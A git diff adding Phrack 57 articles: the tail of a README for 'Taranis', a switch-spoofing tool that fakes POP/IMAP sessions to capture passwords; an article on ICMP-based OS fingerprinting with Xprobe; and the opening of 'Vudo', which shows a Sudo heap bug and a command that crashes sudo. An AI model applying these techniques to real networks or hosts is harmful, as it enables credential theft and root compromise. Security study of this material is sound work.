+Bytes 6-11  are the Source Address
+Bytes 12-13 is  the Type Code (IP is 0x0800)
+
+All of the discussed ethernet types (10base5, 10base2 and 10baseT) are based 
+around a shared medium.  This means that packets are broadcast to every 
+connected machine.  It also means that when one device is sending, no other
+devices can send.
+
+To increase bandwidth, switches were created.  Ethernet switches only forward 
+packets to the port (a port is the hole you plug the cable into) that the 
+packet is destined for.  (This means all ports in the case of a broadcast 
+packet)  This meant that more total packets could be sent through the network 
+if a switch were used than if a hub was used.
+
+Switches and hubs are built to allow uplinking (when you connect another switch
+or hub into a port instead of just a single computer).  In the case of a hub,
+this just means that there are more machines sharing the available bandwidth.
+In the case of a switch it means that the internal traffic from one hub won't
+be seen on other ports.  It also means that multiple ethernet addresses can be 
+on each port and that the switch must contain a list of all of the ethernet 
+addresses that are on a given physical port and only forward traffic to the 
+port that the destination host is on.  It would be silly to require a network 
+administrator to track down the ethernet addresses for each of the connected
+machines and enter them manually to build this list, so switches generate this 
+list automatically by watching network traffic.  
+
+As long as there is a way for this to be configured automatically, the switch 
+is probably vulnerable to this attack.
+
+When run, Taranis will start sending packets with the mail server's ethernet 
+address as the source ethernet address and the attacking machine's real 
+ethernet address as the destination address.  When the switch sees this 
+packet it will update it's internal table of port->ethernet address mappings.  
+(This is called the CAM table.  For more information on how the CAM table
+is updated check, http://routergod.com/gilliananderson/
+For the record, CAM apparently stands for Content Addressable Memory, an 
+extremely generic term) The switch will not forward the packet to any other 
+ports as the destination ethernet address is set to an ethernet address 
+already associated with the current port.
+
+This internal table looks something like this:
+
+Port   | Ethernet Addresses 
+-------+----------------------------------------
+Port 1 | 01:00:af:34:53:62                        (Single host)
+Port 2 | 01:e4:5f:2a:63:35 00:c1:24:ee:62:66 ...  (Hub/Switch)
+Port 3 | 11:af:5a:69:08:63 00:17:72:e1:72:70 ...  (Hub/Switch)
+Port 4 | 00:14:62:74:23:5a                        (Single host)
+...
+
+As far as the switch is concerned, it has a hub connected on that port, and
+it just saw a packet from one host on that hub to another host on the same
+hub.  It doesn't need to forward it anywhere.
+
+Now that we are seeing traffic destined for the mail server, what can we do
+with it?  The initial idea was to perform a man in the middle attack, but 
+this proved to be more difficult than anticipated.  (see the comments for
+switchtest at the end of this file)  Instead taranis spoofs enough of a pop
+or imap session to get a client to authenticate by sending it's username
+and password.
+
+Taranis will store this authentication information to a logfile.  To see 
+everything displayed in a nicer format run:
+  cat taranis.log | sort | uniq
+
+Configuration
+-------------
+Taranis was developed under FreeBSD 4.3.  It also builds under OpenBSD and
+Linux.  If you port it to another platform, send me diff's and I'll integrate
+them into the release.
+
+You will require a patch to your kernel to allow you to spoof ethernet source
+addresses under FreeBSD and OpenBSD.  LibNet has one for OpenBSD and for 
+FreeBSD < 4.0.  I have updated this patch for FreeBSD 4+ and it is included 
+in this archive as if_ethersubr.c.patch.  You can use it as follows.. 
+- su root
+- cd /usr/src/sys/net
+- patch < if_ethersubr.c.patch
+and then rebuild your kernel
+
+Switchtest
+----------
+Switchtest was written during the development of Taranis.  It is included in
+case someone wants to test their switches and ip stacks.  We weren't able to
+find a switch that defaulted to hub mode when confronted with lots of packets
+with random source ethernet addresses.  Maybe someone else will.
+
+It also tries a man in the middle attack.  This shouldn't work as it is based
+on resending traffic to ethernet broadcast or ethernet multicast addresses.
+If a target IP stack is vulnerable, I'd like to hear about it.
+
+We had discussed the possibility of a generalized man in the middle attack.
+It is postulated that you could do a decent job of the attack by redirecting 
+traffic for a while, and queueing the packets, then resetting the switch (with 
+an arp request) and then sending the queued packets, then redirecting again.
+
+This will probably cause a lot of packet drops, but tcp applications may be
+able to continue in the face of this..
+
+FAQ
+---
+Q: Where does the name come from?
+A: Taranis was the name of a god in ancient Gaul.  Whenever I can't think of
+   a name I randomly grab something from www.pantheon.org.
+
+Q: Why do I keep getting PCAP open errors?
+A: You're not root or your kernel doesn't have a pcap compatible way of 
+   capturing packets.  Perhaps your network is not ethernet.
+
+Q: Why am I not seeing packets from the target machine?
+A: There are several possibilities:
+   1. Your system is not spoofing ethernet traffic.  Check the output with
+      ethereal (http://ethereal.zing.org/) or tcpdump (www.tcpdump.org)
+      If you are using tcpdump use the -e flag to display the link level
+      addresses
+   2. If the system you are on is spoofing the ethernet frames correctly
+      it is possible that the switch has a delay before it will switch the
+      port associated with an ethernet address.  Some switches also have 
+      a lock in mode, where they will not accept any changes to their
+      CAM table.
+
+Q: Did [insert network type here] really look like that?
+A: No. But I have no ascii graphics skills.  When I get a chance I'll track 
+   down some real pictures and post them at:
+     www.bitland.net/taranis/diagrams.html 
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack57/7.txt b/phrack57/7.txt
new file mode 100644
index 0000000..0e5bbc9
--- /dev/null
+++ b/phrack57/7.txt
@@ -0,0 +1,401 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x39, Phile #0x07 of 0x12
+
+|=---=[ ICMP based remote OS TCP/IP stack fingerprinting techniques ]=---=|
+|=-----------------------------------------------------------------------=|
+|=---------------=[ Ofir Arkin & Fyodor Yarochkin ]=---------------------=|
+
+
+--[ICMP based fingerprinting approach]--
+
+    TCP based remote OS fingerprinting is quite old(*1) and well-known
+    these days, here we would like to introduce an alternative method to
+    determine an OS remotely based on ICMP responses which are received
+    from the host. Certain accuracy level has been achieved with
+    different platforms, which, with some systems or or classes of
+    platforms (i.g. Win*), is significally more precise than
+    demonstrated with TCP based fingerprinting methods.
+
+    As mentioned above TCP based method, ICMP fingerprinting utilizes
+    several tests to perform remote OS TCP/IP stack probe, but unlike
+    TCP fingerprinting, a number of tests required to identify an OS
+    could vary from 1 to 4 (as of current development stage).
+    
+    ICMP fingerprinting method is based on certain discoveries on
+    differencies of ICMP replies from various operating systems (mostly
+    due to incorrect, or inconsistant implementation), which were found
+    by Ofir Arkin during his "ICMP Usage in Scanning" research project.
+    Later these discoveries were summarised into a logical desicions
+    tree which Ofir entitled "X project" and practically implemented in
+    'Xprobe' tool.
+
+--[Information/Noise ratio with ICMP fingerprints]--
+
+    As it's been noted, the number of datagrams we need to send and
+    receive in order to remotely fingerprint a targeted machine with
+    ICMP based probes is small. Very small. In fact we can send one
+    datagram and receive one reply and this will help us identify up to
+    eight different operating systems (or classes of operating systems).
+    The maximum datagrams which our tool will use at the current stage
+    of development, is four. This is the same number of replies we will
+    need to analyse. This makes ICMP based fingerprinting very
+    time-efficient.  
+
+    ICMP based probes could be crafted to be very stealthy. As on the
+    moment, no maliformed/broken/corrupted datagrams are used to
+    identify remote OS type, unlike the common fingerprinting methods.
+    Current core analysis targets validation of received ICMP responses
+    on valid packets, rather than crafting invalid packets themselves.
+    Heaps of such packets appear in an average network on daily basis
+    and very few IDS systems are tuned to detect such traffic (and those
+    which are, presumably are very noisy and badly configured).
+ 
+--[Why it still works?]--
+
+    Inheritable mess among various TCP/IP stack implementations with
+    ICMP handling implementations which implement different RFC
+    standards (original RFC 792, additional RFC 1122, etc), partial or
+    incomplete ICMP support (various ICMP requests are not supported
+    everywhere), low significance of ICMP Error messages data (who
+    verifies all the fields of the original datagram?!), mistakes and
+    misunderstanding in ICMP protocol implementation made our method
+    viable.
+
+--[What do we fingerprint:]-- 
+
+    Several OS-specific differencies are being utilized in ICMP based
+    fingerprinting to identify remote operating system type:
+
+    IP fields of an 'offending' datagram to be examined:
+
+    * IP total length field
+     
+     Some operating systems (i.g. BSD family) will add 20 bytes
+     (sizeof(ipheader)) to the original IP total length field (which
+     occures due to internal processing mistakes of the datagram, please
+     note when the same packet is read from SOCK_RAW the same behaviour
+     is seen: returned packet ip_len fiend is off by 20 bytes).
+
+     Some other operating systems will decrease 20 bytes from the
+     original IP total lenth field value of the offending packet.
+
+     Third group of systems will echo this field correctly.
+
+    * IP ID
+     some systems are seen not to echo this field correctly. (bit order
+     of the field is changed).
+
+    * 3 bits flags and offset
+
+     some systems are seen not to echo this field correctly. (bit order
+     of the field is changed).
+
+    * IP header checksum
+
+    Some operating systems will miscalculate this field, others just
+    zero it out. Third group of the systems echoes this field correctly.
+
+    * UDP header checksum (in case of UDP datagram)
+    The same thing could happen with UDP checksum header. 
+
+    IP headers of responded ICMP packet:
+    
+    * Precedence bits
+     Each IP Datagram has an 8-bit field called the 'TOS Byte', which
+     represents the IP support for prioritization and Type-of-Service
+     handling.
+   
+    The 'TOS Byte' consists of three fields.
+   
+    The 'Precedence field'\cite{rfc791}, which is 3-bit long, is intended to
+    prioritize the IP Datagram. It has eight levels of prioritization.
+   
+    Higher priority traffic should be sent before lower priority traffic.
+   
+    The second field, 4 bits long, is the 'Type-of-Service' field. It is
+    intended to describe how the network should make tradeoffs between
+    throughput, delay, reliability, and cost in routing an IP Datagram.
+   
+    The last field, the 'MBZ' (must be zero), is unused and must be zero.
+    Routers and hosts ignore this last field. This field is 1 bit long.
+    The TOS Bits and MBZ fields are being replaced by the DiffServ
+    mechanism for QoS.
+    
+    RFC 1812 Requires following for IP Version 4 Routers:
+   
+    "4.3.2.5 TOS and Precedence
+   
+    ICMP Source Quench error messages, if sent at all, MUST have their
+    IP Precedence field set to the same value as the IP Precedence field
+    in the packet that provoked the sending of the ICMP Source Quench
+    message. All other ICMP error messages (Destination Unreachable,
+    Redirect, Time Exceeded, and Parameter Problem) SHOULD have their
+    precedence value set to 6 (INTERNETWORK CONTROL) or 7 (NETWORK
+    CONTROL). The IP Precedence value for these error messages MAY be
+    settable".  
+
+    Linux Kernel 2.0.x, 2.2.x, 2.4.x will act as routers and will set
+    their Precedence bits field value to 0xc0 with ICMP error messages.
+    Networking devices that will act the same will be Cisco routers
+    based on IOS 11.x-12.x and Foundry Networks switches.
+
+    * DF bits echoing   
+    Some TCP/IP stacks will echo DF bit with ICMP Error datagrams,
+    others (like linux) will copy the whole octet completely, zeroing
+    certain bits, others will ignore this field and set their own.
+   
+    * IP ID filend (linux 2.4.0 - 2.4.4 kernels)
+
+    Linux machines based on Kernel 2.4.0-2.4.4 will set the IP
+    Identification field value with their ICMP query request and reply
+    messages to a value of zero.
+   
+    This was later fixed with Linux Kernels 2.4.5 and up.
+  
+
+    * IP ttl field (ttl distance to the target has to be precalculated to
+    guarantee accuracy).
+
+       
+    "The sender sets the time to live field to a value that represents
+    the maximum time the datagram is allowed to travel on the Internet".
+   
+    The field value is decreased at each point that the IP header is
+    being processed. RFC 791 states that this field decreasement reflects
+    the time spent processing the datagram. The field value is measured
+    in units of seconds. The RFC also states that the maximum time to
+    live value can be set to 255 seconds, which equals to 4.25 minutes.
+    The datagram must be discarded if this field value equals zero -
+    before reaching its destination.
+   
+    Relating to this field as a measure to assess time is a bit
+    misleading. Some routers may process the datagram faster than a
+    second, and some may process the datagram longer than a second.
+       
+    The real intention is to have an upper bound to the datagram
+    lifetime, so infinite loops of undelivered datagrams will not jam the
+    Internet.
+   
+    Having a bound to the datagram lifetime help us to prevent old
+    duplicates to arrive after a certain time elapsed. So when we
+    retransmit a piece of information which was not previously delivered
+    we can be assured that the older duplicate is already discarded and
+    will not interfere with the process.
+   
+    The IP TTL field value with ICMP has two separate values, one for
+    ICMP query messages and one for ICMP query replies.  
+
+    The IP TTL field value helps us identify certain operating systems
+    and groups of operating systems. It also provides us with the
+    simplest means to add another check criterion when we are querying
+    other host(s) or listening to traffic (sniffing).
+
+    TTL-based fingeprinting requires a TTL distance to the done to be
+    precalculated in advance (unless a fingerprinting of a local network
+    based system is performed system).
+   
+    The ICMP Error messages will use values used by ICMP query request
+    messages.  
+   
+ 
+    A good statistics of ttl dependancy on OS type has been gathered at:
+    http://www.switch.ch/docs/ttl_default.html
+    (Research paper on default ttl values)
+    
+
+    * TOS field
+
+    RFC 1349 defines the usage of the Type-of-Service field with the
+    ICMP messages. It distinguishes between ICMP error messages
+    (Destination Unreachable, Source Quench, Redirect, Time Exceeded,
+    and Parameter Problem), ICMP query messages (Echo, Router
+    Solicitation, Timestamp, Information request, Address Mask request)
+    and ICMP reply messages (Echo reply, Router Advertisement, Timestamp
+    reply, Information reply, Address Mask reply).
+   
+   Simple rules are defined:
+     * An ICMP error message is always sent with the default TOS (0x0000)
+       
+     * An ICMP request message may be sent with any value in the TOS
+     field. "A mechanism to allow the user to specify the TOS value to
+     be used would be a useful feature in many applications that
+     generate ICMP request messages".
+       
+     The RFC further specify that although ICMP request messages are
+     normally sent with the default TOS, there are sometimes good
+     reasons why they would be sent with some other TOS value.
+       
+     * An ICMP reply message is sent with the same value in the TOS
+     field as was used in the corresponding ICMP request message.
+       
+    Some operating systems will ignore RFC 1349 when sending ICMP echo
+    reply messages, and will not send the same value in the TOS field as
+    was used in the corresponding ICMP request message.
+    
+    ICMP headers of responded ICMP packet:
+
+    * ICMP Error Message Quoting Size:
+    
+    All ICMP error messages consist of an IP header, an ICMP header
+    and certain amount of data of the original datagram, which triggered
+    the error (aka offending datagram).
+    
+    According to RFC 792 only 64 bits (8 octets) of original datagram
+    are supposed to be included in the ICMP error message. However RFC
+    1122 (issued later) recommends up to 576 octets to be quoted.
+    
+    Most of "older" TCP stack implementations will include 8 octets into
+    ICMP Errror message. Linux/HPUX 11.x, Solaris, MacOS and others will
+    include more.
+
+    Noticiably interesting is the fact that Solaris engineers probably
+    couldn't not read RFC properly (since instead of 64 bits Solaris
+    2.x includes 64 octets (512 bits) of the original datagram.
+
+    * ICMP error Message echoing integrity
+
+    Another artifact which has been noticed is that some stack
+    implementations, when sending back an ICMP error message, may alter
+    the offending packet's IP header and the underlying protocol data,
+    which is echoed back with the ICMP error message.
+
+    Since mistakes, made by TCP/IP stack programmers are different and
+    specific to an operating system, an analysis of these mistakes could
+    give a potential attacker a a possibilty to make assumptions about
+    the target operating system type.
+   
+    Additional tweaks and twists:
+    * Using difererent from zero code fields in ICMP echo requests
+ 
+    When an ICMP code field value different than zero (0) is sent with
+    an ICMP Echo request message (type 8), operating systems that will
+    answer our query with an ICMP Echo reply message that are based on
+    one of the Microsoft based operating systems will send back an ICMP
+    code field value of zero with their ICMP Echo Reply. Other operating
+    systems (and networking devices) will echo back the ICMP code field
+    value we were using with the ICMP Echo Request.
+   
+    The Microsoft based operating systems acts in contrast to RFC
+    792 guidelines which instruct the answering operating systems to
+    only change the ICMP type to Echo reply (type 0), recalculate the
+    checksums and send the ICMP Echo reply away.
+   
+    * Using DF bit echoing with ICMP query messages
+    
+    As in case of ICMP Error messages, some tcp stacks will respond
+    these queries, while the others: will not. 
+
+    * Other ICMP messages:
+        * ICMP timestamp request
+        * ICMP Information request
+        * ICMP Address mask request
+    
+    Some TCP/IP stacks support these messages and respond to some of
+    these requests.    
+
+--[Xprobe implementation]--
+ 
+    Currently Xprobe deploys hardcoded logic tree, developed by Ofir
+    Arkin in 'Project X'. Initially a UDP datagram is being sent to a
+    closed port in order to trigger ICMP Error message: ICMP
+    unreachable/port unreach.  (this sets up a limitation of having at
+    least one port not filtered on target system  with no service
+    running, generically speaking other methods of triggering ICMP
+    unreach packet could be used, this will be discussed further).
+    Moreover, a few tests (icmp unreach content, DF bits, TOS ...) could
+    be combined within a single query, since they do not affect results
+    of each other.
+    Upon the receipt of ICMP unreachable datagram, contents of the
+    received datagram is examined and a diagnostics decision is made, if
+    any further tests are required, according to the logic tree, further
+    queries are sent.
+
+--[ Logic tree]---
+
+    Quickly recapping the logic tree organization:
+
+    Initially all TCP/IP stack implementations are split into 2 groups,
+    those which echo precedence bits back, and those which do not. Those
+    which do echo precendence bits (linux 2.0.x, 2.2.x, 2.4.x, cisco IOS
+    11.x-12.x, Extreme Network Switches etc), being differentiated
+    further based on ICMP error quoting size. (Linux sticks with RFC
+    1122 here and echoes up to 576 octets, while others in this subgroup
+    echo only 64 bits (8 octets)). Further echo integrity checks are
+    used to differentiate cisco routers from Extreme Network switches.
+
+    Time-to-live and IP ID fields of ICMP echo reply  are being used to
+    recognize version of linux kernel.
+
+    The same approach is being used to recognize other TCP/IP stacks.
+    Data echoing validation (amounts of octets of original datagram
+    echoed, checksum validation, etc). If additional information is
+    needed to differ two 'similar' IP stacks, additional query is being
+    sent. (please refer to the diagram at
+    http://www.sys-security.com/html/projects/X.html for more detailed
+    explanation/graphical representation of the logic tree).
+  
+    One of the serious problems with the logic tree, is that adding new
+    operating system types to it becomes extremely painful. At times
+    part of the whole logic tree has to be reworked to 'fit' a single
+    description. Therefore a singature based fingerprinting method took
+    our closer attention.
+  
+--[Sinature based approach]--
+
+    Singature based approach is what we are currently focusing on and
+    which we believe will be further, more stable, reliable and flexible
+    method of remote ICMP based fingerprints.
+
+    Signature-based method is currently based on five different tests,
+    which optionally could be included in each operating system
+    fingerprint. Initally the systems with lesser amount of tests are
+    being examined (normally starting with ICMP unreach test).
+    
+    If no single OS stack found matching received signature, those
+    stacks which match a part, being grouped again, and another test
+    (based on lesser amounts of tests issued principle) is choosen and
+    executed. This verification is repeated until an OS stack,
+    completely matching the signature is found, or we run out of tests.
+
+    Currently following tests are being deployed:
+
+    * ICMP unreachable test (udp closed port based, host unreachable,
+    network unreachable (for systems which are believed to be gateways)
+    * ICMP echo request/reply test
+    * ICMP timestamp request
+    * ICMP information request
+    * ICMP address mask request
+
+--[future implementations/development]--
+
+    Following issues are planned to be deployed (we always welcome
+    discussions/suggestions though):
+    * Fingerprints database (currently being tested)
+    * Dynamic, AI based logic (long-term project :))
+    * Tests would heavily dependent on network topology (pre-test
+    network mapping  will take place).
+    * Path-to-target test (to calculate hops distance to the target)
+     filtering devices probes.
+    * Future implementations will be using packets with
+    actual application data to dismiss chances of being detected.
+    * other network mapping capabilities shall be included (
+     network role identification, search for closed UDP port, reachability
+     tests, etc).
+
+--[code for kids]--
+
+  Currently implemented code and further documentation is available at
+  following locations: 
+
+  http://www.sys-security.com/html/projects/X.html
+
+  http://xprobe.sourceforge.net
+  
+  http://www.notlsd.net/xprobe/
+
+Ofir Arkin <ofir@sys-security.com>
+Fyodor Yarochkin <fygrave@tigerteam.net>
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack57/8.txt b/phrack57/8.txt
new file mode 100644
index 0000000..a286926
--- /dev/null
+++ b/phrack57/8.txt
@@ -0,0 +1,2937 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x39, Phile #0x08 of 0x12
+
+--=[ Disclaimer ]=-----------------------------------------------------//
+
+In this issue of Phrack, there are two similar articles about malloc based
+exploitation techniques. The first one explains in detail the GNU C Library
+implementation of the malloc interface and how it can be abused to exploit
+buffer overflows in malloc space. The second article is a more hands-on
+approach to introduce you to the idea of malloc overflows. It covers the
+System V implementation and the GNU C Library implementation. If you are not
+sure about the topic, it may be a better choice to start with it to get an
+idea of the subject. However, if you are serious about learning this
+technique, there is no way around the article by MaXX.
+
+--=[ Enjoy ]=------------------------------------------------------------//
+
+
+|=[ Vudo - An object superstitiously believed to embody magical powers ]=-|
+|=-----------------------------------------------------------------------=|
+|=------------=[ Michel "MaXX" Kaempf <maxx@synnergy.net> ]=-------------=|
+|=---------------[ Copyright (C) 2001 Synnergy Networks ]=---------------=|
+
+
+The present paper could probably have been entitled "Smashing The
+Heap For Fun And Profit"... indeed, the memory allocator used by the
+GNU C Library (Doug Lea's Malloc) and the associated heap corruption
+techniques are presented. However, it was entitled "Vudo - An object
+superstitiously believed to embody magical powers" since a recent Sudo
+vulnerability and the associated Vudo exploit are presented as well.
+
+--[ Contents ]----------------------------------------------------------
+
+1 - Introduction
+
+2 - The "potential security problem"
+  2.1 - A real problem
+    2.1.1 - The vulnerable function
+    2.1.2 - The segmentation violation
+  2.2 - An unreal exploit
+  2.3 - Corrupting the heap
+  2.4 - Temporary conclusion
+
+3 - Doug Lea's Malloc
+  3.1 - A memory allocator
+    3.1.1 - Goals
+    3.1.2 - Algorithms
+      3.1.2.1 - Boundary tags
+      3.1.2.2 - Binning
+      3.1.2.3 - Locality preservation
+      3.1.2.4 - Wilderness preservation
+      3.1.2.5 - Memory mapping
+  3.2 - Chunks of memory
+    3.2.1 - Synopsis of public routines
+    3.2.2 - Vital statistics
+    3.2.3 - Available chunks
+  3.3 - Boundary tags
+    3.3.1 - Structure
+    3.3.2 - Size of a chunk
+    3.3.3 - prev_size field
+    3.3.4 - size field
+  3.4 - Bins
+    3.4.1 - Indexing into bins
+    3.4.2 - Linking chunks in bin lists
+  3.5 - Main public routines
+    3.5.1 - The malloc(3) algorithm
+    3.5.2 - The free(3) algorithm
+    3.5.3 - The realloc(3) algorithm
+  3.6 - Execution of arbitrary code
+    3.6.1 - The unlink() technique
+      3.6.1.1 - Concept
+      3.6.1.2 - Proof of concept
+    3.6.2 - The frontlink() technique
+      3.6.2.1 - Concept
+      3.6.2.2 - Proof of concept
+
+4 - Exploiting the Sudo vulnerability
+  4.1 - The theory
+  4.2 - The practice
+
+5 - Acknowledgements
+
+6 - Outroduction
+
+
+--[ 1 - Introduction ]--------------------------------------------------
+
+Sudo (superuser do) allows a system administrator to give certain users
+(or groups of users) the ability to run some (or all) commands as root
+or another user while logging the commands and arguments.
+-- http://www.courtesan.com/sudo/index.html
+
+On February 19, 2001, Sudo version 1.6.3p6 was released: "This fixes
+a potential security problem. So far, the bug does not appear to be
+exploitable." Despite the comments sent to various security mailing
+lists after the announce of the new Sudo version, the bug is not a
+buffer overflow and the bug does not damage the stack.
+
+But the bug is exploitable: even a single byte located somewhere in the
+heap, erroneously overwritten by a NUL byte before a call to syslog(3)
+and immediately restored after the syslog(3) call, may actually lead to
+execution of arbitrary code as root. Kick off your shoes, put your feet
+up, lean back and just enjoy the... voodoo.
+
+The present paper focuses on Linux/Intel systems and:
+
+- details the aforementioned bug and explains why a precise knowledge of
+how malloc works internally is needed in order to exploit it;
+
+- describes the functioning of the memory allocator used by the GNU C
+Library (Doug Lea's Malloc), from the attacker's point of view;
+
+- applies this information to the Sudo bug, and presents a working
+exploit for Red Hat Linux/Intel 6.2 (Zoot) sudo-1.6.1-1.
+
+
+--[ 2 - The "potential security problem" ]------------------------------
+
+----[ 2.1 - A real problem ]--------------------------------------------
+
+------[ 2.1.1 - The vulnerable function ]-------------------------------
+
+The vulnerable function, do_syslog(), can be found in the logging.c file
+of the Sudo tarball. It is called by two other functions, log_auth() and
+log_error(), in order to syslog allow/deny and error messages. If the
+message is longer than MAXSYSLOGLEN (960) characters, do_syslog() splits
+it into parts, breaking up the line into what will fit on one syslog
+line (at most MAXSYSLOGLEN characters) and trying to break on a word
+boundary if possible (words are delimited by SPACE characters here).
+
+/*
+ * Log a message to syslog, pre-pending the username and splitting the
+ * message into parts if it is longer than MAXSYSLOGLEN.
+ */
+static void do_syslog( int pri, char * msg )
+{
+    int count;
+    char * p;
+    char * tmp;
+    char save;
+
+    /*
+     * Log the full line, breaking into multiple syslog(3) calls if
+     * necessary
+     */
+[1] for ( p=msg, count=0; count < strlen(msg)/MAXSYSLOGLEN + 1; count++ ) {
+[2]     if ( strlen(p) > MAXSYSLOGLEN ) {
+            /*
+             * Break up the line into what will fit on one syslog(3) line
+             * Try to break on a word boundary if possible.
+             */
+[3]         for ( tmp = p + MAXSYSLOGLEN; tmp > p && *tmp != ' '; tmp-- )
+                ;
+            if ( tmp <= p )
+[4]             tmp = p + MAXSYSLOGLEN;
+
+            /* NULL terminate line, but save the char to restore later */
+            save = *tmp;
+[5]         *tmp = '\0';
+
+            if ( count == 0 )
+                SYSLOG( pri, "%8.8s : %s", user_name, p );
+            else
+                SYSLOG( pri,"%8.8s : (command continued) %s",user_name,p );
+
+            /* restore saved character */
+[6]         *tmp = save;
+
+            /* Eliminate leading whitespace */
+[7]         for ( p = tmp; *p != ' '; p++ )
+                ;
+[8]     } else {
+            if ( count == 0 )
+                SYSLOG( pri, "%8.8s : %s", user_name, p );
+            else
+                SYSLOG( pri,"%8.8s : (command continued) %s",user_name,p );
+        }
+    }
+}
+
+------[ 2.1.2 - The segmentation violation ]----------------------------
+
+Chris Wilson discovered that long command line arguments cause Sudo to
+crash during the do_syslog() operation:
+
+$ /usr/bin/sudo /bin/false `/usr/bin/perl -e 'print "A" x 31337'`
+Password:
+maxx is not in the sudoers file.  This incident will be reported.
+Segmentation fault
+
+Indeed, the loop[7] does not check for NUL characters and therefore
+pushes p way after the end of the NUL terminated character string
+msg (created by log_auth() or log_error() via easprintf(), a wrapper
+to vasprintf(3)). When p reaches the end of the heap (msg is of
+course located in the heap since vasprintf(3) relies on malloc(3) and
+realloc(3) to allocate dynamic memory) Sudo eventually dies on line[7]
+with a segmentation violation after an out of-bounds read operation.
+
+This segmentation fault occurs only when long command line arguments are
+passed to Sudo because the loop[7] has to be run many times in order to
+reach the end of the heap (there could indeed be many SPACE characters,
+which force do_syslog() to leave the loop[7], after the end of the msg
+buffer but before the end of the heap). Consequently, the length of the
+msg string has to be many times MAXSYSLOGLEN because the loop[1] runs as
+long as count does not reach (strlen(msg)/MAXSYSLOGLEN + 1).
+
+----[ 2.2 - An unreal exploit ]-----------------------------------------
+
+Dying after an illegal read operation is one thing, being able to
+perform an illegal write operation in order to gain root privileges
+is another. Unfortunately do_syslog() alters the heap at two places
+only: line[5] and line[6]. If do_syslog() erroneously overwrites a
+character at line[5], it has to be exploited during one of the syslog(3)
+calls between line[5] and line[6], because the erroneously overwritten
+character is immediately restored at line[6].
+
+Since msg was allocated in the heap via malloc(3) and realloc(3),
+there is an interesting structure stored just after the end of the msg
+buffer, maintained internally by malloc: a so-called boundary tag.
+If syslog(3) uses one of the malloc functions (calloc(3), malloc(3),
+free(3) or realloc(3)) and if the Sudo exploit corrupts that boundary
+tag during the execution of do_syslog(), evil things could happen. But
+does syslog(3) actually call malloc functions?
+
+$ /usr/bin/sudo /bin/false `/usr/bin/perl -e 'print "A" x 1337'`
+[...]
+malloc( 100 ): 0x08068120;
+malloc( 300 ): 0x08060de0;
+free( 0x08068120 );
+malloc( 700 ): 0x08060f10;
+free( 0x08060de0 );
+malloc( 1500 ): 0x080623b0;
+free( 0x08060f10 );
+realloc( 0x080623b0, 1420 ): 0x080623b0;
+[...]
+malloc( 192 ): 0x08062940;
+malloc( 8192 ): 0x080681c8;
+realloc( 0x080681c8, 119 ): 0x080681c8;
+free( 0x08062940 );
+free( 0x080681c8 );
+[...]
+
+The first series of malloc calls was performed by log_auth() in order
+to allocate memory for the msg buffer, but the second series of malloc
+calls was performed... by syslog(3). Maybe the Sudo exploit is not that
+unreal after all.
+
+----[ 2.3 - Corrupting the heap ]---------------------------------------
+
+However, is it really possible to alter a given byte of the boundary
+tag located after the msg buffer (or more generally to overwrite at
+line[5] an arbitrary character (after the end of msg) with a NUL byte)?
+If the Sudo exploit exclusively relies on the content of the msg buffer
+(which is fortunately composed of various user-supplied strings (current
+working directory, sudo command, and so on)), the answer is no. This
+assertion is demonstrated below.
+
+The character overwritten at line[5] by a NUL byte is pointed to by tmp:
+
+- tmp comes from loop[3] if there is a SPACE character among the first
+MAXSYSLOGLEN bytes after p. tmp then points to the first SPACE character
+encountered when looping from (p + MAXSYSLOGLEN) down to p.
+
+-- If the overwritten SPACE character is located within the msg buffer,
+there is no heap corruption at all because the write operation is not an
+illegal one.
+
+-- If this first encountered SPACE character is located outside the msg
+buffer, the Sudo exploit cannot control its exact position if it solely
+relies on the content of the msg buffer, and thus cannot control where
+the NUL byte is written.
+
+- tmp comes from line[4] if there is no SPACE character among the first
+MAXSYSLOGLEN bytes after p. tmp is then equal to (p + MAXSYSLOGLEN).
+
+-- If p and tmp are both located within the msg buffer, there is no
+possible memory corruption, because overwriting the tmp character
+located within a buffer returned by malloc is a perfectly legal action.
+
+-- If p is located within the msg buffer and tmp is located outside
+the msg buffer... this is impossible because the NUL terminator at the
+end of the msg buffer, placed between p and tmp, prevents do_syslog()
+from successfully passing the test[2] (and the code at line[8] is not
+interesting because it performs no write operation).
+
+Moreover, if the test[2] fails once it will always fail, because
+p will never be modifed again and strlen(p) will therefore stay
+less than or equal to MAXSYSLOGLEN, forcing do_syslog() to run the
+code at line[8] again and again, as long as count does not reach
+(strlen(msg)/MAXSYSLOGLEN + 1).
+
+-- If p and tmp are both located outside the msg buffer, p points to
+the first SPACE character encountered after the end of the msg string
+because it was pushed outside the msg buffer by the loop[7]. If the Sudo
+exploit exclusively relies on the content of the msg buffer, it cannot
+control p because it cannot control the occurrence of SPACE characters
+after the end of the msg string. Consequently, it cannot control tmp,
+which points to the place where the NUL byte is written, because tmp
+depends on p.
+
+Moreover, after p was pushed outside the msg buffer by the loop[7],
+there should be no NUL character between p and (p + MAXSYSLOGLEN) in
+order to successfully pass the test[2]. The Sudo exploit should once
+again rely on the content of the memory after msg.
+
+----[ 2.4 - Temporary conclusion ]--------------------------------------
+
+The Sudo exploit should:
+
+- overwrite a byte of the boundary tag located after the msg buffer with
+the NUL byte... it should therefore control the content of the memory
+after msg (managed by malloc) because, as proven in 2.3, the control of
+the msg buffer itself is not sufficient;
+
+- take advantage of the erroneously overwritten byte before it is
+restored... one of the malloc calls performed by syslog(3) should
+therefore read the corrupted boundary tag and further alter the usual
+execution of Sudo.
+
+But in order to be able to perform these tasks, an in depth knowledge of
+how malloc works internally is needed.
+
+
+--[ 3 - Doug Lea's Malloc ]---------------------------------------------
+
+Doug Lea's Malloc (or dlmalloc for short) is the memory allocator used
+by the GNU C Library (available in the malloc directory of the library
+source tree). It manages the heap and therefore provides the calloc(3),
+malloc(3), free(3) and realloc(3) functions which allocate and free
+dynamic memory.
+
+The description below focuses on the aspects of dlmalloc needed to
+successfully corrupt the heap and subsequently exploit one of the malloc
+calls in order to execute arbitrary code. A more complete description
+is available in the GNU C Library source tree and at the following
+addresses:
+
+ftp://gee.cs.oswego.edu/pub/misc/malloc.c
+http://gee.cs.oswego.edu/dl/html/malloc.html
+
+----[ 3.1 - A memory allocator ]----------------------------------------
+
+"This is not the fastest, most space-conserving, most portable, or most
